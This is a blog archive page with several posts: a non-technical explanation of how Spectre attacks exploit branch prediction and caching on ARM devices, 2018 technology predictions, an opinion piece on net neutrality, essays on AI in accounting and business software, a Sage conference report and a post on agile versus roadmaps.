Stephen Smith's Blog

Musings on Machine Learning…

Archive for the ‘Business’ Category

Spectre Attacks on ARM Devices

leave a comment »

Introduction

I predicted that 2018 would be a very bad year for data breaches and security problems, and we have already started the year with the Intel x86 specific Meltdown exploit and the Spectre exploit that works on all sorts of processors and even on some JavaScript systems (like Chrome). Since my last article was on Assembler programming and most of these type exploits are created in Assembler, I thought it might be fun to look at how Spectre works and get a feel for how hackers can retrieve useful data out of what seems like nowhere. Spectre is actually a large new family of exploits so patching them all is going to take quite a bit of time, and like the older buffer overrun exploits, are going to keep reappearing.

I’ve been writing quite a bit about the Raspberry Pi recently, so is the Raspberry Pi affected by Spectre? After all it affects all Android and Apple devices based on ARM processors. The main Raspberry Pi operating system is Raspbian which is variant of Debian Linux optimized for the Pi. A recent criticism of Raspbian is that it is still 32-Bit. It turns out that running the ARM in 32-bit mode eliminates a lot of the Spectre attack scenarios. We’ll discuss why this is in the article. If you are running 64-Bit software on the Pi (like running Android) then you are susceptible. You are also susceptible to the software versions of this attack like those in JavaScript interpreters that support branch prediction (like Chromium).

The Spectre hacks work by exploiting how processor branch prediction works coupled with how data is cached. The exploits use branch prediction to access data it shouldn’t and then use the processor cache to retrieve the data for use. The original article by the security researchers is really quite good and worth a read. Its available here. It has an appendix at the back with C code for Intel processors that is quite interesting.

Branch Prediction

In our last blog post we mentioned that all the data processing assembler instructions were conditionally executed. This was because if you perform a branch instruction then the instruction pipeline needs to be cleared and restarted. This will really stall the processor. The ARM 32-bit solution was good as long as compilers are good at generating code that efficiently utilize these. Remember that most code for ARM processors is compiled using GCC and GCC is a general purpose compiler that works on all sorts of processors and its optimizations tend to be general purpose rather than processor specific. When ARM evaluated adding 64-Bit instructions, they wanted to keep the instructions 32-Bit in length, but they wanted to add a bunch of instructions as well (like integer divide), so they made the decision to eliminate the bits used for conditionally executing instructions and have a bigger opcode instead (and hence lots more instructions). I think they also considered that their conditional instructions weren’t being used as much as they should be and weren’t earning their keep. Plus they now had more transistors to play with so they could do a couple of other things instead. One is that they lengthed the instruction pipeline to be much longer than the current three instructions and the other was to implement branch prediction. Here the processor had a table of 128 branches and the route they took last time through. The processor would then execute the most commonly chosen branch assuming that once the conditional was figured out, it would very rarely need to throw away the work and start over. Generally this larger pipeline with branch prediction lead to much better performance results. So what could go wrong?

Consider the branch statement:

 

if (x < array1_size)
    y = array2[array1[x] * 256];


This looks like a good bit of C code to test if an array is in range before accessing it. If it didn’t do this check then we could get a buffer overrun vulnerability by making x larger than the array size and accessing memory beyond the array. Hackers are very good at exploiting buffer overruns. But sadly (for hackers) programmers are getting better at putting these sort of checks in (or having automated or higher level languages do it for them).

Now consider branch prediction. Suppose we execute this code hundreds of times with legitimate values of x. The processor will see the conditional is usually true and the second line is usually executed. So now branch prediction will see this and when this code is executed it will just start execution of the second line right away and work out the first line in a second execution unit at the same time. But what if we enter a large value of x? Now branch prediction will execute the second line and y will get a piece of memory it shouldn’t. But so what, eventually the conditional in the first line will be evaluated and that value of y will be discarded. Some processors will even zero it out (after all they do security review these things). So how does that help the hacker? The trick turns out to be exploiting processor caching.

Processor Caching

No matter how fast memory companies claim their super fast DDR4 memory is, it really isn’t, at least compared to CPU registers. To get a bit of extra speed out of memory access all CPUs implement some sort of memory cache where recently used parts of main memory are cached in the CPU for faster access. Often CPUs have multiple levels of cache, a super fast one, a fast one and a not quite as fast one. The trick then to getting at the incorrectly calculated value of y above is to somehow figure out how to access it from the cache. No CPU has a read from cache assembler instruction, this would cause havoc and definitely be a security problem. This is really the CPU vulnerability, that the incorrectly calculated buffer overrun y is in the cache. Hackers figured out, not how to read this value but to infer it by timing memory accesses. They could clear the cache (this is generally supported and even if it isn’t you could read lots of zeros). Then time how long it takes to read various bytes. Basically a byte in cache will read much faster than a byte from main memory and this then reveals what the value of y was. Very tricky.

Recap

So to recap, the Spectre exploit works by:

  1. Clear the cache
  2. Execute the target branch code repeatedly with correct values
  3. Execute the target with an incorrect value
  4. Loop through possible values timing the read access to find the one in cache

This can then be put in a loop to read large portions of a programs private memory.

Summary

The Spectre attack is a very serious new technique for hackers to hack into our data. This will be like buffer overruns and there won’t be one quick fix, people are going to be patching systems for a long time on this one. As more hackers understand this attack, there will be all sorts of creative offshoots that will deal further havoc.

Some of the remedies like turning off branch prediction or memory caching will cause huge performance problems. Generally the real fixes need to be in the CPUs. Beyond this, systems like JavaScript interpreters, or even systems like the .Net runtime or Java VMs could have this vulnerability in their optimization systems. These can be fixed in software, but now you require a huge number of systems to be patched and we know from experience that this will take a very long time with all sorts of bad things happening along the way.

The good news for Raspberry Pi Raspbian users, is that the ARM in the older 32-Bit mode isn’t susceptible. It is only susceptible through software uses like JavaScript. Also as hackers develop these techniques going forwards perhaps they can find a combination that works for the Raspberry, so you can never be complacent.

 

Advertisements

Written by smist08

January 5, 2018 at 10:42 pm

Predictions for 2018

with one comment

Introduction

As 2017 draws to a close, I see a lot of predictions articles for the new year. I’ve never done one before, so what the heck. Predictions articles are notorious for being completely wrong, so take this with a grain of salt. The main problem is that things tend to take much longer than people expect so sometimes predictions are correct, but take ten years instead of one. Then again some predictions are just completely wrong. Some predictions keep reappearing and never coming true, like Linux replacing Windows or Microsoft releasing a successful phone. I think most writers find they get a lot of readers on these articles and then no one bothers to check up on them a year later. I’ll assume this is the case and go ahead and make some predictions. Some of these will be more concrete and some will be continuing trends.

Blockchain/Bitcoin

I’m not going to make any predictions on the value of Bitcoin. The more interesting part is the blockchain algorithm behind it. This algorithm allows a method to ensure reliable transfers of money in a distributed manner. The real disruption will come when services like credit or debit cards start to be supplanted via blockchain transactions that don’t require any centralized authority. Several big companies like IBM are investing heavily in the infrastructure to support this. Right now credit and debit cards charge very high fees and many businesses are highly motivated to find an alternate solution. Blockchain offers a ray of hope to remove the transaction charge/tax that exists today on every transaction. I doubt that credit and debit cards will disappear this year, but I do predict that blockchain will start to appear in a number of business to business financial exchanges perhaps something like Walmart and their suppliers. This will be the start of a long decline for the existing credit and debit card companies unless they innovate and reduce their costs. Right now they are going the route of lobbying governments to make blockchain illegal, but like with the music industry protecting CDs they are fighting an ultimately losing battle.

AI

What we are calling Artificial Intelligence will continue to evolve and become more and more useful. We won’t reach true strong AI this year and the singularity is still a ways off, but the advances are coming quickly both on the algorithms side and the hardware to run them on. Will this be the year of the self driving car? Perhaps in small numbers. We are already seeing self driving taxis in Singapore and Phoenix. I think we are primed for this to take off big time. Some of the big cost savings will come from self driving buses, taxis and trucks. However governments still need to figure out how to alleviate the disruption to the work force this will cause. We will see more and more AI solutions rolled out in sales, inventory replenishment and scientific research. Speech, translation and handwriting recognition systems will continue to get better and better. Predictive systems that suggest movies to watch and music to listen to will get better and better. Products like Alexis and Google Home will become more widespread and their perceived intelligence will improve daily.

Privacy and Security

2017 was a very bad year for data breaches, ransomware attacks, government interference and a general trend to imposing restrictions on the Internet. 2018 will be worse. We have national security agencies like the Russians operating with immunity. We have rogue nations like North Korea launching ransomware attacks. We have the removal of Net Neutrality in the USA allowing ISPs and the government to spy on everything you do. Due to the amounts of money involved and a general lack of oversight or prosecution from governments, 2018 will set new records for data breaches, stealing of personal information, botnets and ransomware attacks.

DIY

In the early days of personal computers the Apple II and IBM PC were quite open hardware architectures with slots for expansion boards and all sorts of interface capabilities. Software was also open, interfaces were documented (either by the manufacturer or reverse engineers) and you could run any software you liked. Now hardware is all closed with no interface slots and you are often lucky to get a USB port. With many modern devices you can’t even replace the battery.

With the introduction of the $35 Raspberry Pi, suddenly DIY and home hardware projects have had a resurgence. Since the Raspberry Pi runs Linux, you can run any software you like on it (ie no regulated App store).

The Raspberry Pi won’t have a refresh until 2019, but in the meantime many companies seeing an opportunity are offering similar board with more memory and other enhancements. Int 2018 we’ll see the continuing explosion of Raspberry Pi sales and an explosion of add-ons and DIY projects. All the similar and clone products should also do well and fill some niches that the Pi has ignored.

Low Cost Computers

The Raspberry Pi showed you can make a fully useful computer for $35. Others have noticed and Microsoft has produced and ARM version of Windows. Now we are seeing small complete computers based on ARM processors being released. Right now they are a bit expensive for what you get, but for 2018 I predict we are going to start seeing fully usable computers for around $200. These will be more functional than the existing x86 based Chromebooks and Netbooks and allow you to run a choice of OS’s, including Linux, Android and Windows. I think part of what will make these more successful is that emulation software has gotten much better so you can you x86 programs on these devices now. Expect to see more RAM than a Pi and SSD drives installed. For laptops expect quite long battery life.

AR/VR

Augmented Reality and Virtual Reality have received a lot of attention recently, but I think the headsets are still too clunky and these will remain a small niche device through 2018. Popular perhaps in the odd game, not really mainstream yet.

Cloud Migration

People’s cloud migrations will continue. But due to the complexity of hybrid clouds and Infrastructure as a Service (IaaS), many are going to reconsider. Companies will rethink managing their own software installations, and just adopt Software as a Service (SaaS). Many companies will move their data centers to the cloud whether Amazon, Google, Microsoft or another. But they will find this quite complex and quite expensive over time. This will cause them to consider migrating from their purchased, installed applications to true SaaS offerings. Then they don’t have to worry about infrastructure at all. Although IaaS will continue to grow in 2018, SaaS will grow faster. Similarly at some point in a few years IaaS will reach a maximum and start to slowly decline. The exception will be specialty infrastures like those with specialized AI processors or GPUs that can perform specific high intensity jobs, but don’t require a continuous subscription.

Summary

Those are my predictions for 2018. Blockchain starting to blossom, security and privacy under greater attack, AI appearing everywhere (and not just marketing material), DIY gaining strength, dramatically lower cost computers, not much in AR/VR and cloud cycling through local data centers to IaaS to SaaS. I guess we can check back next year to see how we did.

 

Merry Christmas and Happy New Year.

 

Written by smist08

December 21, 2017 at 9:55 pm

On Net Neutrality

leave a comment »

Introduction

With Ajit Pai and the Republican led FCC removing net neutrality regulations in the USA, there is a lot of debate about what this all means and how it will affect our Internet. Another question will be whether other jurisdictions like here in Canada follow suite. The Net Neutrality regulations in the USA were introduced by Barack Obama in 2015 to combat some bad practices by Internet Service Providers (ISPs) that were also cable companies. Namely they were trying to kill off streaming services like NetFlix to preserve their monopoly on TV content via their pay by channel model. Net Neutrality put a stop to that by requiring all data over the Internet’s pipes be treated equally. Under net neutrality streaming services blossomed and thrived. Are they now too big to fail? Can new companies have any chance to succeed? Will we all be paying more for basic Internet? Let’s look at the desires of the various players and see what hope we have for the Internet.

Evil Cable Companies

The cable companies want to maintain their cable TV channel business model where they charge TV channels to be part of their packages and then charge the consumers for getting them (plus the consumer has to pay by watching commercials). With the Internet people are going around the cable companies with various streaming services. The cable company charges a flat (high) monthly charge for Internet access usually based on maximum allowable bandwidth. What the cable companies don’t like is that people are switching in droves to streaming services like NetFlix, Amazon Prime or Crave. Like the music companies fighting to save CD sales, they are fighting a losing battle, just pissing off their customers and probably accelerating their decline.

So what do the Cable companies want? They want a number of things. One is to have a mechanism to stifle new technologies and protect their existing business models. This means monitoring what people are doing and then blocking or throttling things they don’t like. Another is to try to make up revenue on the ISP side as cable subscription revenue declines. For this they want more of an App market where you buy or subscribe to bundles of apps to get your Internet access. They see what the cell phone manufacturers are doing and want a piece of that action.

The cable companies know that most people have very limited choices and that if the few big remaining cable and phone companies implement these models then consumers will have no choice but to comply.

Evil Cell Phone Companies

Like the cable companies, the phone companies want to protect their existing business models. To some degree the world has already changed on them and they no longer make all their money charging for long distance phone calls. Instead they charge rather exorbitant fees for cell phone Internet access. Often due to mergers the phone and cable companies are one and the same. So the phone companies often have the same Interests as the cable companies. Similarly to the cable companies without net neutrality, the phone companies can start to throttle services they feel compete with their own services like Skype and Facetime. They also want the power to kill any future technologies that threaten them.

Evil Internet Companies

The big Internet companies like Google and Facebook claim they promote net neutrality. But their track record isn’t great. Apple invented the App market which Google happily embraced for Android. Many feel the App market is as big a threat to the Internet as the loss of Net Neutrality. Instead of using a general Internet browser, the expectation is that you use a collection of Apps on your phone. This adds to the cost of startups since they need to produce a website and then  both a iOS and Android App for their service. Apps are heavily controlled by the Apple and Google App stores. Apps that Apple or Google don’t like are removed. This way Apple and Google have very strong control on stifling new innovative companies that they feel threatened by. Similarly companies like Facebook or Netflix that have the resources to create lots of Apps for all sorts of platforms, so they aren’t really fighting for Net Neutrality so much as ensuring their apps run on all sorts of TV set top boxes and other device platforms. They don’t mind so much paying extra fees as this all raises the cost of entry for future competitors.

Evil Government

Why is the government so keen to eliminate Net Neutrality? The main thing is control. Right now the Internet is like the wild west and they are scared they don’t have sufficient control of it. They want to promote the technologies like deep packet inspection that the ISPs are working on. They would like to be able to be a man in the middle in secure communications and monitor everything. They would love to be able to remove sites from the Internet. I think many western governments are looking jealousy at what China does with their Great Firewall and would love the same control. In the early days of the telephone the dangers of government abuse were recognized and that is why they put in laws that required search warrants from judges to tap or trace phone calls. Now the government has fought hard to not require the same oversight on Internet monitoring. They see the removal of Net Neutrality as their opening to working with a few large ISPs to gain much better monitoring and control of the Internet.

The mandate of the government is to provide some corporate oversight to avoid monopolistic abuses of power. They have failed in this by allowing such a large consolidation of ISPs to very few companies and then refusing to regulate or provide any checks and balances over this new monopoly. As long as the government is scared of the Internet and considers it in its best interest to restrict it, things don’t look good.

Pirates and Open Source to the Rescue

So far that looks like a lot of power working to control and regulate the Internet. What are some ways to combat that? Especially if there is very little competition in ISPs due to all the mergers that have taken place. Let’s look at a few alternatives.

Competition

Where there is competition, take the time to read reviews and shop around. Often you will get better service with a smaller provider. Even if it costs a bit more, factor in whether you get better privacy and more freedom in your Internet access. Really just money controls these decisions and a consumer revolt can be very powerful. Also beware of multi-year contracts that make it hard to change providers (assuming you actually have a choice).

VPN

in many countries VPNs are already illegal. That could happen in North America. But if it does it will greatly restrict people’s ability to work at home. As long as you can use a VPN you have some freedom and privacy. However note that most VPNs don’t have the bandwidth to use streaming video services and would likely be throttled if they did.

The Dark Net

Another option is the darknet and setting up Tor nodes and using the Onion browser. The problem here is that it’s too technical for most people and mostly used for criminal enterprises. But if things start to get really bad due to the loss of Net Neutrality, more development will go into these technologies and they could become more widespread.

Peer to Peer

BitTorrent has shown that a completely distributed peer to peer network is extremely hard to disrupt. Governments and major corporations have spent huge amounts of time and money trying to take down BitTorrent sites used to share movies and other digital content. Yet they have failed. It could be that the loss of Net Neutrality will drive more development into these technologies and force a lot of services to abandon the centralized server model of Internet development. After all if your service comes from millions of IP addresses all over the world then how does an ISP throttle that?

Use Browsers not Apps

If you access web sites more from Browsers than Apps then you are helping promote an open and free Internet. If there isn’t an app store involved it can help keep services available. The good thing is that the core technologies in the Mozilla and WebKit browsers is open source so creating and maintaining Browsers isn’t under the control of a small group of companies. Chromium and Firefox are both really good open source browsers that run on many operating systems and devices.

Summary

Will the loss of Net Neutrality in the USA destroy the Internet? Only time will tell. But I think we will start to see a lot of news stories (if they aren’t censored) over the coming years as the large ISPs start to flex their muscles. We saw the start of this with the throttling of streaming services that caused Net Neutrality to be enacted and we’ll see those abuses restored fairly quickly.

At least in the western world these sorts of bad government decision making can be overridden by elections, but it takes a lot of activism to make changes given the huge amounts of money the cable and phone companies donate to both political parties.

Written by smist08

December 19, 2017 at 7:22 pm

Your New AI Accountant

leave a comment »

Introduction

We live in a complex world where we’ve accumulated huge amounts of knowledge. Knowing everything for a profession is getting harder and harder. We have better and better knowledge retrieval programs that let us look up information at our fingertips using natural language queries and Google like searches. But in fields like medicine and law, sifting through all the results and sorting out what is relevant and important is getting harder and harder. Especially in medicine there is a lot of bogus and misleading information that can lead to disastrous results. This is a prime application area where Artificial Intelligence and Machine Learning are starting show some real promise. We have applications like IBM’s Watson successfully diagnosing some quite rare conditions that stumped doctors. We have systems like ROSS that provide AI solutions for law firms.

How about AIs supplementing Accountants? Accountants are very busy and in demand.  All the baby boomers are retiring now, and far more Accountants are retiring than are being replaced by young people entering the profession. For many businesses getting professional business advice from Accountants is getting to be a major problem. This affects them properly meeting financial reporting requirements, legal regulatory compliance and generally having a firm complete understanding on how their business is doing. This article is going to look at how AI can help with this problem. We’ll look at the sort of things that AIs can be trained to do to help perform some of these functions. Of course you will still need an Accountant to provide human oversight and to provide a sanity check, but if things are setup correctly to start with, it will save you a lot of time and money.

Interfaces

If you have an AI with Accounting knowledge, how can it help you? In this sections we’ll look at a few ways that the AI system could interact with both the employees of the business as well as the Business Applications the business uses like their Accounting or CRM systems.

Chatbots

Chatbots are becoming more common, here you either type natural language queries to the AI, or it has a voice recognition component that you can talk to. The query processor is connected to the AI and the AI is then connected to your company’s databases as well as a wealth of professional information on the Internet. These AIs usually have multiple components for voice input, natural language processing, various business areas of expertise, and multiple ways of presenting results.

There have been some notable chatbot failures like Microsoft’s Twitter Chatbot which quickly became a racist asshole. But we are starting to see the start of some more successful implementations like Sage’s Pegg or KLM’s Messenger Bot. Plus the general purpose bots like Alexa, Siri and Allo are getting rather good. There are also some really good toolkits, like Amazon Lex, available to develop chatbots so this becomes easier for more and more developers.

In-program Advice

There have been some terrible examples of in-product advice such as the best forgotten Microsoft Clippy. But with advances in User Centered Design, much less intrusive and subtle ways of helping users have emerged. Generally these require good content so what they present is actually useful, plus they have to be unobtrusive so they never interfere with someone doing their work unless they want to pay attention to them. Then when they are used they can offer to make changes automatically, provide more information or keep things to a simple one line tip.

If these help technologies are combined with an AI engine then they can monitor what the user is doing and present application and context based help. For instance suggesting that perhaps a different G/L account should be used here for better Financial Reporting. Perhaps suggesting that the sales taxes on an invoice should be different due to some local regulations. Making suggestions on additional items that should be added to an Accounting document.

These technologies allow the system to learn from how a company uses the product and to make more useful suggestions. As well as having access to industry standards that can be incorporated to assist.

Offline Monitoring

In most larger businesses, the person using the Business Application isn’t the one that needs or can use an Accountant’s advice. Most data entry personnel have to follow corporate procedures and would get fired if they changed what they’ve been told to do, even if it’s wrong. Usually this has to be the CFO or someone senior in the Accounting department. In these cases an AI can monitor what is going on in the business and make recommendations to the right person. Perhaps seeing how G/L Accounts are being used and sending a recommendation for some changes to facilitate better Financial Reporting or regulatory compliance.

Care has to be taken to keep this functionality clear of other unpopular productivity monitoring software that does things like record people’s keystrokes to monitor when they are working and how fast. Generally this functionality has to stick to improving the business rather than be perceived as big brother snitching on everyone.

Summary

Most small business owners consider Accounting as a necessary evil that they are required to do to submit their corporate income tax. They do the minimum required and don’t pay much attention to the results. But as their company grows their Accounting data can give them great insights to how their business is running. Managing Inventory, A/R and A/P make huge differences to a company’s cash flow and profitability. Correctly and proactively handling regulatory compliance can be a huge time saver and huge cost saver in fines and lawsuits.

It used to be that sophisticated programs to handle these things required huge IT departments, millions of dollars invested in software and really was only available to large corporations. With the current advances in AI and Machine Learning, many of these sophisticated functionalities can be integrated into the Business Applications used by all small and medium sized businesses. In fact in a few years this will be a mandatory feature that users expect in all the software they use.

Written by smist08

July 29, 2017 at 8:42 pm

Making Business Applications Intelligent

leave a comment »

Introduction

Today Business Applications tend to be rather boring programs which present the user with rather complicated forms that need to be filled in with a lot of detail. Accuracy is tantamount and there are a lot of security measures to prevent fraud and theft. Companies need to hire large numbers of people to enter data very repetitively into these forms. With modern User Centered Design these forms have become a bit easier to work with and have progressed quite a bit since the original Business Apps on 3270 terminals connected to IBM Mainframes, but I don’t think anyone really considers these applications fun. Necessary and important yes, but still not many people’s favorite programs.

We’ve been talking a lot about the road to strong AI and we’ve looked at a number of AI tools like TensorFlow, but what about more practical applications that are possible right now? My background is working on ERP software, namely Sage 300/Accpac. In this article I’ll be looking at how we’ll be seeing machine learning/AI algorithms start to be incorporated into standard business applications. A lot of what we will talk about here will be integrated into many applications including things like CRM and Business Analytics.

Many of the ideas I talk about in this article are available today, just not all in the same place. Over the coming years I think we’ll see most of these become standard expected features in every Business Application. Just like we expect modern User Centered Design, tomorrow we will expect intelligent algorithms supporting us behind the scenes in everything we do.

Very High Level Diagram of the Main Components of an Intelligent Business Application

Some Quick Ideas

With Machine Learning and AI algorithms there could be many small improvements made to Business Applications, there could be major changes in the way things work, all the way up to automating many of the processes that we currently perform manually. Often small improvements can make a huge difference to the lives of current users and are the easiest to implement, so I don’t want to ignore these possibilities on the way to pursuing larger more ambitious longer term goals. Perhaps these AI applications aren’t as exciting as self-driving cars or real time speech translation, but they will make a huge difference to business productivity and lead to large cost savings to millions of companies. They will provide real business benefit with better accuracy, better productivity and automated business processes that lead to real cost savings and real revenue boosts.

Better Defaulting of Fields

Currently fields tend to be defaulted based on configuration screens configured by administrators. These might change based on an object like a customer or customer group, but tend to be fairly static. An algorithm could watch what a user (or all the users at a company) tend to use and make much more intelligent defaults. These could be based on various contexts of other fields, time/date, current promotions, even news feed items. If defaults are provided more intelligently, then it will save users huge time in data entry.

Better Auto-Suggestions

Currently auto-suggestions on fields tend to be based on a combination of previous values entered and performing a “Google-like” search on what has been typed so far. Like defaulting this could be greatly improved by adding more sophisticated algorithms to improve the suggestions. The real Google search already does this, but most “Google-like” searches integrated into Business Apps do not. Like defaulting, having auto-suggestions give better more intelligent recommendations will greatly improve productivity. Like Google Search uses all your previous searches, trending topics, social media feeds and many other sources, so could your Business Application.

Fraud Detection

Credit card companies already use AI to scan people’s credit card purchasing patterns as well as the patterns of people using stolen credit cards to flag when they think a credit card has been stolen or compromised. Similarly Business Applications can monitor various company procedures and expenses to detect theft (perhaps strangeness in Inventory Adjustments) or unusual payments. Here there could be regulatory restrictions on what data could be used, for instance HR data is probably protected from being incorporated in this sort of analysis. Currently theft and fraud is a huge cost to businesses and AI could help reduce it. Sometimes just knowing that tools like this are being used can act as a major deterrent.

Purchasing

Algorithms could be used to better detect when items are needed to reduce inventory levels. Further the algorithms can continuously search vendor prices looking for deals and consider whether its worth buying now at a cheaper price and incurring the inventory expense or waiting. When you regularly purchase thousands or more items, a dynamic algorithm keeping on track of things can really help.

Customer Data

When you get a new customer you need all sorts of information such as their address, phone number, contacts, etc. Perhaps an algorithm could also search the web and fill in this information automatically (perhaps this is a specific example of better defaulting). Plus the AI could scan various web source (some perhaps pay services for credit ratings and such) to suggest a good credit rating/limit for this new customer. The algorithm could also run in the background and update existing customers as this data changes, since keeping customer data up to date is a major challenge for companies with many customers. Knowing and keeping up to date with your customers is a major challenge for many companies and much of this work can be automated.

Chasing Accounts Receivables

Collecting money is always a major challenge for every company. Much of this work could be automated. Plus algorithms can watch the paying habits of customers to know if say they alway pay on the end of  the quarter, not to worry so much when they go over 30 days. But if a customer suddenly gets credit rating problems or their stock tanks or there is negative news on the company then you better get collecting. Again this is all a lot of work and algorithms can greatly reduce the manual workload and make the whole process more efficient.

Setting Prices

Setting prices is an art and a science. You need to lower prices to move slow moving items out of inventory and try to keep prices high to maximize return. You need to be aware of competitors prices and watch for these items going on sale. Algorithms can greatly help with this. Amazon is a master of this, maintaining millions of prices with AI all over their web site. Algorithms can scan the web for competitive pricing, watch inventory levels and item costs, know where we are in a quarter and how much we need to stimulate sales to meet targets. These algorithms can make all the trade offs of knowing our customer loyalty versus having to be low cost, etc. Similarly this can affect customer and volume discounts. Once you have a lot of items for sale, maintain prices is a lot of work, especially in the world of online shopping where everything is changing so dynamically. With the big guys like Amazon and Walmart using these algorithms so effectively, you need to as well to be competitive.

Summary

This article just gave a few examples of the many places we’ll be seeing AI and Machine Learning algorithms becoming integrated into all our Business Applications. The examples in this article are all possible today and in use individually by large corporations. The cost of all these technologies is coming down and we are seeing these become integrated into lower cost Business Applications for small and medium sized businesses.

As these become adopted by more and more companies, it will become a competitive necessity to adopt them or risk becoming uncompetitive in the fast paced online world. There will still be a human element to monitor and provide policies but humans can perform many of these tasks at the speed and scale that today’s world requires.

For the users of Business Applications, the addition of AI to the User Interactions, should make these applications much more pleasant to operate. Instead of gotchas there will be helpful suggestions and reminders. Instead of needed to memorize and lookup all sorts of codes, these will be usefully provided wherever necessary. I think this transition will be as big as the transition we made from text based applications to GUI applications, but in this case I think the real ROI will be much higher.

 

Written by smist08

July 26, 2017 at 2:03 am

Sage Connect 2016

with 4 comments

Introduction

The Sage Connect 2016 conference has just wrapped up in Sydney, Australia. I was very happy to be able to head over there and give a one-day training class on our new Web UIs SDK, and then give a few sessions in the main conferences. This year the conference combined all the Sage Australia/New Zealand/Pacific Islands products into one show. So there were customers and partners from Sage HandiSoft, Sage MicrOpay, Sage One as well as the usual people from Sage CRM, Sage 300, Sage CRE and Sage X3.

The show was on for two days where the first day was for customers and partners and then the second day was for partners only. As a result, the first day had around 600 people in attendance. There was a networking event for everyone at the end of the first day and then a gala awards dinner for the partners after the second day.

A notable part of the keynote was the kick-off of the Sage Foundation in Australia with a sponsorship of Orange Sky Laundry. Certainly a worthwhile cause that is doing a lot of good work helping Australia’s homeless population.

There was a leadership forum featuring three prominent Australian entrepreneurs discussing their careers and providing advice based on their experience. These were Naomi Simpson of Red Balloon, Brad Smith of Braaap Motorcycles and Steve Vamos of Telstra. I found Brad Smith especially interesting as he created a motorcycle manufacturer from scratch.

The event was held at the conference center at the Australian Technology Park. This was very interesting since it was converted from the Eveleigh Railway Workshops and still contains many exhibits and equipment from that era. It created an interesting contrast of 2016 era high tech to the heavy industry that was high tech around 1900.

Sage 300

The big news for Sage 300 was the continued roll out of our Web UIs. With the Sage 300 2016.1 release just being rolled out this adds the I/C, O/E and P/O screens along with quite a few other screens and quite a few other enhancements. Jaqueline Li, the Product Manager for Sage 300 was also at the show and presented the roadmap for what customers and partners can expect in the next release as well.

Sage is big on promoting the golden triangle of Accounting, Payments and Payroll. In Australia this is represented by Sage 300, Sage Payment Solutions and Sage MicrOPay which all integrate to complete the triangle for the customers. Sage Payment Solutions (SPS) is the same one as in North American and now operates in the USA, Canada and Australia.

Don Thomson one of the original founders of Accpac and the developer of the Access-C compiler was present representing his current venture TaiRox. Here he is being interviewed by Mike Lorge, the Managing Director Sage Business Solutions, on the direction of Sage 300 during one of the keynote sessions.

donthom

Development Partners

Sage 300 has a large community of ISVs that provide specialized vertical Accounting modules, reporting tools, utilities and customized solutions. These solutions have been instrumental in making Sage 300 a successful product and a successful platform for business applications. Without these company’s relentless passionate support, Sage 300 wouldn’t have anywhere near the market share it has today.

There were quite a few exhibiting at the Connect conference as well as providing pre-conference training and conference sessions. Some of the participants were: Altec, Accu-Dart, AutoSimply, BSP Software, Dingosoft, Enabling, Greytrix, HighJump, InfoCentral, Orchid, Pacific Technologies, Symphony, TaiRox and Technisoft.

exhibis

I gave a pre-conference SDK training class on our new Web UIs, so hopefully we will be seeing some Web versions of these products shortly.

Summary

It’s a long flight from Vancouver to Sydney, but at least it’s a direct flight. The time zone difference is 19 hours ahead, so you feel it as 5 hours back which isn’t too bad. Going from Canadian winter to Australian summer is always enjoyable to get some sunshine and feel the warmth. Sydney was hopping with tourist season in full swing, multiple cruise ships docked in the harbor, Chinese new year celebrations in full swing and all sorts of other events going on.

The conference went really well, and was exciting and energizing. Hopefully everyone learned something and became more excited about what we have today and what is coming down the road.

Of course you can’t visit Australia without going to the beach, so here is one last photo, in this case of Bondi Beach. Surf’s up!

bondi

Written by smist08

February 25, 2016 at 2:46 am

Agile Vs Roadmap

with 9 comments

Introduction

We often receive RFPs (Request for Proposals) that demand a firm committed five year product roadmap. Similarly we are often criticized for not having such a “golden” roadmap when other competing products have. Having now worked in an Agile world for some time now, these requests seem stranger and stranger.

The quibble here isn’t with having a plan, it’s with the inflexibility these requests imply. That a company needs to set its course for five years and then any change in that plan is somehow a failure to deliver. That as knowledge and circumstances change that you need to stick to the plan and not adapt to the new situation.

Products are now introduced in “Internet” time. This means they are updated far more frequently (sometimes several times a day). All companies are looking to be “disruptive” and to “redefine” their market. Under these fast moving and fast changing conditions does it make sense to have a fixed long term roadmap?

On the other hand a product needs direction. A product needs long term thinking. You need to decide when to do something quick and dirty versus laying more groundwork and infrastructure to support future features. Stakeholders need to have an idea where a product is developing and what might be coming down the road.

There are quite a few types of roadmaps, there are technology roadmaps, feature roadmaps, release roadmaps, stop list roadmaps, marketing, strategy and many others. This articles generally applies to any of these.

Roadmap

Waste Not, Want Not

One of the key tenants of Agile Development is to reduce and if possible eliminate waste. Waste is any extra work that is being performed by team mates that doesn’t directly add value during the agile sprints. One main source of waste is doing too much and too detailed estimating. If you want a team to commit to estimates then they have to spend a lot of time working through those estimates so that they have the necessary precision. However when you do this, this work is often just waste, since then the work isn’t done due to changing priorities or another team does the work and insists on repeating the process or the project is postponed and when its resumed things have changed.

Roadmaps tend to generate a lot of wasted work. Once a company wants a roadmap that everyone is committed to, then far too much time will have been spent working on the estimates. The trick here is to be willing to accept inaccurate estimates. Many studies have shown that inaccurate WAG (Wild-Ass Guesses) type estimates aren’t really any less accurate than carefully constructed ones. All you need to know for building a roadmap is the order of magnitude of an item, not the details.

Detailed estimates are only done when the stories are going to be performed by the agile team. This work usually happens as a part of backlog grooming in the sprint before the work is actually going to be done. This then ensures that the stories are properly broken down and that the work can fit into one sprint.

Accept the Roadmap as a Guideline

The best way to think of a roadmap is as a guideline for current thinking. It is a mechanism to elicit feedback which can then be used to produce a better roadmap. Publishing a roadmap as a “fait accompli” doesn’t serve nearly as well as using a roadmap as a starting point for a conversation.

Often getting customer feedback on direction without providing any context or ideas is quite difficult because customers don’t spend their time thinking about how you need to develop your product. With a roadmap they can see how your product will fit in (or not) with their future business directions. Then they can provide useful feedback on what will be useful, what will be irrelevant and what will actually be harmful.

Keep in mind that conversations are two way things and the only way to be successful is to incorporate the feedback received and to show that the time spent by the customer talking to you is worthwhile. Corporations that can incorporate and synthesize the feedback from hundreds of customers in an effective manner tend to be the companies that really shine.

agile

Accept that Agile Works

A lot of times the push for a fixed roadmap is a result of the organization outside of R&D not being comfortable with the Agile idea of working on the most important story all the time. They liked the old days where a giant requirements document was produced and upper level management reviewed this and then felt comfortable that they could let R&D go off for a year or two to work on this without paying any more attention.

